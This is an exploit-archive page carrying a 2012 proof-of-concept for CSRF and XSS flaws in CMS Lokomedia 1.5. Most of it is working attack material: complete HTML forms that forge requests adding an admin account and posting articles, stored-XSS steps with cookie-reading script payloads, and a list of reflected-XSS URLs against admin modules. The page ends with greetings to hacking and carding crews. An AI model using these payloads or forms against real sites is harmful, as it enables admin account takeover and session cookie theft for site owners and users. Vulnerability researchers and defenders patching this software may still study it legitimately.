exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CMS Lokomedia 1.5 Cross Site Request Forgery / Cross Site Scripting

CMS Lokomedia 1.5 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 22, 2012
Authored by the_cyber_nuxbie

CMS Lokomedia version 1.5 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | a4fb376b53311da0808f524b506bdcf28600bb6b6eef0e9628cc2ae47aab4be8

CMS Lokomedia 1.5 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
0 [x] Official Website: http://www.1337day.com 1
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0
0 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1
1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
<<<:>>> CMS Lokomedia - CSRF/XSS Vulnerability <<<:>>>
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : CMS Lokomedia - CSRF/XSS Vulnerability
./CMS Version : Lokomedia - Version: 1.5
./Software Link : www.bukulokomedia.com
./Author Exploit: [ TheCyberNuxbie ]
./Security Risk : [ Medium Level ]
./Category XPL : [ WebApps/ZeroDay ]
./Time & Date : June, 21 2012. 06:27 AM.
./System Tested : Windows 7 Ultimate, Firefox 9.0.1, Xampp-win32-1.7.3
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

############################################################################
# - POC:
# 1.1 Exploit - CSRF (Add Admin).
# 1.2 Exploit - CSRF (Add Article).
# 2.1 Presistent XSS (module=hubungi).
# 2.2 Reflected XSS.
############################################################################
#
# 1.1 Exploit - CSRF (Add Admin):
#
# <html>
# <head>
# <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
# <title>CMS Lokomedia - CSRF Add Admin Exploit</title>
# </head>
# <body>
# <form method="POST" action="http://lokomedia/adminweb/modul/mod_users/aksi_users.php?module=user&act=input" enctype="multipart/form-data">
# <input type="hidden" name="username" value="nuxbie">
# <input type="hidden" name="password" value="nuxbie">
# <input type="hidden" name="nama_lengkap" value="nuxbie">
# <input type="hidden" name="email" value="root@31337sec.com">
# <input type="hidden" name="no_telp" value="0271">
# <input type="submit" value="SAVE">
# <input type="button" value="CANCEL" onclick=self.history.back()>
# </form>
# </body>
# </html>
#
# [ End Of Code ]
#
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
#
# 1.2 Exploit - CSRF (Add Article):
#
# <html>
# <head>
# <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
# <title>CMS Lokomedia - CSRF Add Article Exploit</title>
# </head>
# <body>
# <form method="POST" action="http://lokomedia/adminweb/modul/mod_berita/aksi_berita.php?module=berita&act=input" enctype="multipart/form-data">
# <input type="hidden" name="judul" value="New Article With CSRF">
# <select name="kategori">
# <option value=21></option>
# <input type="hidden" type=radio name="headline" value="Y" checked>
# <input type="hidden" type=radio name="publish" value="N">
# <textarea name="isi_berita">
# [ PASTE YOUR NEW ARTICLES ]
# </textarea><br>
# <input type="file" name="fupload"><br>
# <input type="submit" value="SAVE">
# <input type="button" value="CANCEL" onclick=self.history.back()>
# </form>
# </body>
# </html>
#
# [ End Of Code ]
#
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# 2.1 Presistent XSS (module=hubungi):
#
# [ Sample XSS Script ]
# <script>alert('31337');</script>
# <script>alert(document.cookie);</script>
# <script>window.open("http://www.1337day.com/")</script>
# , etc...
#
# - Go to: http://Lokomedia/hubungi-kami.html
# Post your messege with script XSS In any of the text fields.
# For this we used the captcha verification for the following messege (Presistent XSS).
#
# - Input Verification "captcha"...
# "Kirim" (send this messege).
#
# - Messege From WebApps:
# "Terima kasih telah menghubungi kami. Kami akan segera meresponnya."
#
# - Then if a ADMIN visits your page module "hubungi".
# http://Lokomedia/adminweb/media.php?module=hubungi <--- If Admin View This Page, The Script XSS Will Execute.
#
# [ Presistent XSS Has Been Succesfuly (execute) ]
#
# 2.2 Reflected XSS:
# http://lokomedia/adminweb/media.php?module=berita&halaman=<script>alert(document.cookie);</script>
# http://lokomedia/adminweb/media.php?module=agenda&halaman=<script>alert(document.cookie);</script>
# http://lokomedia/adminweb/media.php?module=download&halaman=<script>alert(document.cookie);</script>
# http://lokomedia/adminweb/media.php?module=templates&halaman=<script>alert(document.cookie);</script>
# http://lokomedia/adminweb/media.php?module=galerifoto&halaman=<script>alert(document.cookie);</script>
#
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...
# BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,,
# , And All Inj3ct0r Fans & All Hacktivist,,,
#
#################################################################################
# [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ] #
# [ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ] #
# [ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ] #
# -------------------[ We Are c0d3rs And We Are An Exploit ]------------------- #
# [ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu ] #
# [ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, Sammy FORGIT, NoGe ] #
# [ cr4wl3r, eidelweiss, v3n0m, g3mb3lz_YCL, team_elite, Hmei7, kaMtiEz, c4uR ] #
# [ cyberlog, y3dips, K-159, the_day, irvian, k1tk4t, b374k, EA Ngel, OoN_Boy ] #
# [ mywisdom, Flyff666, YaDoY666, jos_ali_joe, Vrs-hCk, OLiBekaS, vYc0d s4va ] #
# [ Elmonny, Dencowbie, Cyberbag0r, r4h0x, SeekerUnZero, AfniGates, ./etc.. ] #
#################################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close